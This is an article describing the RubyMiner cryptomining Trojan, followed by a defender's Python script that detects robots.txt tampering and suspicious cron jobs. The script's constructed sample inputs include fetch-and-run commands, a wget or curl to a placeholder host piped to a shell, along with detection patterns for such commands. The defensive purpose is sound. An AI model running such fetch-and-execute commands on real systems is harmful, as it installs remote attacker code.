
RubyMiner

Posted: January 17, 2018

RubyMiner is a Trojan that exploits the infected PC's resources for creating cryptocurrency for a remote attacker's wallet. Although it has no interface for the user, RubyMiner may be detectable by some of its minor symptoms, such as causing instability and bad performance in other programs. Users should have their anti-malware products eliminating RubyMiner and double-check their server software for any appropriate security updates that could prevent further attacks.

A Real Gem of a Mining Trojan

Half a year ago, malware analysts took notice of Trojan campaigns exploiting the XMRig application to make money from its cryptocurrency 'mining' feature set. The latest iteration of this Black Hat business model, observable in the RubyMiner campaign, attacks an enormous range of Web servers with little to no discrimination, beyond checking for the presence of long-outdated vulnerabilities. RubyMiner also carries some extra changes to its XMRig component that differentiate it meaningfully from older versions of that program.

RubyMiner's threat actors are using a breadth of attack scope to compensate for lack of subtlety, and use a handful of vulnerabilities dating back as long ago as 2012 to infect random Web servers around the world. A Unix-based scheduling application 'drops' the main payload: a version of XMRig that has had its five percent 'donation' to the author removed, which allows all of the Monero-based profits to go to the cybercrooks. Like any 'good' cryptocurrency-mining Trojan, RubyMiner has no victim-facing UI, and malware experts warn that any victims shouldn't assume that an infection is detectable by any visual symptoms.

Another aspect of RubyMiner that highlights its relative uniqueness is how it implements its scheduled tasks. Instead of simply running the mining routine on an hourly schedule, RubyMiner re-downloads the attacker-controlled 'robots.txt' configuration file on every run. While this downloading behavior leaves a larger footprint that can reveal the infection, it also lets the threat actors modify RubyMiner's behavior on the fly, including the possibility of implementing a 'turn off' or kill switch function.

Polishing Off a Gem-Inset Server Pandemic

RubyMiner's authors are running a server-based campaign that abuses the ordinary 'robots.txt' component, a configuration file that tells Web crawlers which parts of a site they may index, to accomplish harmful feats it was never intended for. Because all of the vulnerabilities used in this campaign are significantly outdated, malware experts recommend updating all Web server software to eliminate the infection vectors that RubyMiner is abusing. At this time, roughly thirty percent of all Web servers around the world are targets of attempted, if not always successful, RubyMiner infections.

Because RubyMiner disguises its components as part of the server's internal ecosystem, administrators may want to monitor their robots.txt file and related configuration storage for any unwarranted tampering. Cryptocurrency miners like RubyMiner, if left alone, may cause performance issues, or even permanent hardware damage, on any individual infected PC. However, standard anti-malware programs should have no problems deleting RubyMiner's components, just as with any other, non-server-based Trojan.
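The two behaviors described above, a scheduled job that re-fetches a 'robots.txt' file and tampering with the robots.txt on disk, are both things a server administrator can check for mechanically. The following Python script is an added example written for this article; it is not code from the RubyMiner campaign or from any vendor tool. It assumes the robots.txt field names listed in ROBOTS_FIELDS are the only legitimate directives, and the sample robots.txt and crontab text it scans are constructed inputs using a placeholder host, not real indicators.

```python
"""Defender-side checks for the robots.txt / cron pattern described above.

Added example for this article. Sample inputs below are constructed; the
'placeholder.invalid' host is a stand-in, not a real indicator.
"""
import hashlib
import re
from typing import Dict, List

# Assumption: a legitimate robots.txt only uses these field names (plus
# blank lines and '#' comments). Anything else is treated as foreign content.
ROBOTS_FIELDS = {"user-agent", "disallow", "allow", "sitemap", "crawl-delay", "host"}

# Patterns that, inside a cron command, point at fetch-and-execute behavior.
DOWNLOADERS = re.compile(r"\b(curl|wget)\b", re.IGNORECASE)
SHELL_PIPE = re.compile(r"\|\s*(sh|bash|dash|ksh)\b|\b(sh|bash)\s+-c\b", re.IGNORECASE)


def sha256_hex(text: str) -> str:
    """Hash a file's text so a known-good baseline can be stored and compared."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def robots_drifted(baseline_hash: str, current_text: str) -> bool:
    """True when the robots.txt on disk no longer matches the recorded baseline."""
    return sha256_hex(current_text) != baseline_hash


def foreign_robots_lines(robots_text: str) -> List[str]:
    """Return robots.txt lines that are neither blank, comments, nor known directives.

    A robots.txt that carries shell commands or other non-directive content is
    the kind of tampering the article warns about.
    """
    suspicious = []
    for raw in robots_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        field, sep, _ = line.partition(":")
        if sep != ":" or field.strip().lower() not in ROBOTS_FIELDS:
            suspicious.append(raw)
    return suspicious


def suspicious_cron_entries(crontab_text: str) -> List[Dict[str, str]]:
    """Flag crontab lines that download something and hand it to a shell.

    A single reason alone (e.g. a plain curl health check) is not flagged;
    two or more reasons on one entry are.
    """
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # A crontab entry is five schedule fields followed by the command.
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        command = parts[5]
        reasons = []
        if DOWNLOADERS.search(command):
            reasons.append("remote download")
        if SHELL_PIPE.search(command):
            reasons.append("piped to shell")
        if "robots.txt" in command:
            reasons.append("fetches robots.txt")
        if len(reasons) >= 2:
            findings.append({"line": raw, "reasons": ", ".join(reasons)})
    return findings


# Constructed sample inputs (not real RubyMiner artifacts).
CLEAN_ROBOTS = "User-agent: *\nDisallow: /admin/\nSitemap: https://example.com/sitemap.xml\n"
TAMPERED_ROBOTS = CLEAN_ROBOTS + "wget -O - http://placeholder.invalid/x.sh | sh\n"
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
0 * * * * curl -s http://placeholder.invalid/robots.txt | bash
"""


def audit(baseline_hash: str, robots_text: str, crontab_text: str) -> Dict[str, object]:
    """Run all three checks and return their results in one report."""
    return {
        "robots_drifted": robots_drifted(baseline_hash, robots_text),
        "foreign_robots_lines": foreign_robots_lines(robots_text),
        "cron_findings": suspicious_cron_entries(crontab_text),
    }


if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_ROBOTS)
    for key, value in audit(baseline, TAMPERED_ROBOTS, SAMPLE_CRONTAB).items():
        print(f"{key}: {value}")
```

On a live server the three inputs would come from the site's robots.txt, a baseline hash recorded when the file was known to be clean, and the output of `crontab -l` for each account (plus the files under /etc/cron.d). The hash comparison catches any change at all; the directive check explains what changed; and the cron scan looks for the re-download behavior the article describes regardless of which host the job points at.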

Although there's profit to be found in a highly precise and sophisticated Trojan attack, not every cybercrook operates with that degree of caution. When threat actors deploy Trojans like RubyMiner in the fashion of a blunderbuss or cannon, subtlety is overrated.
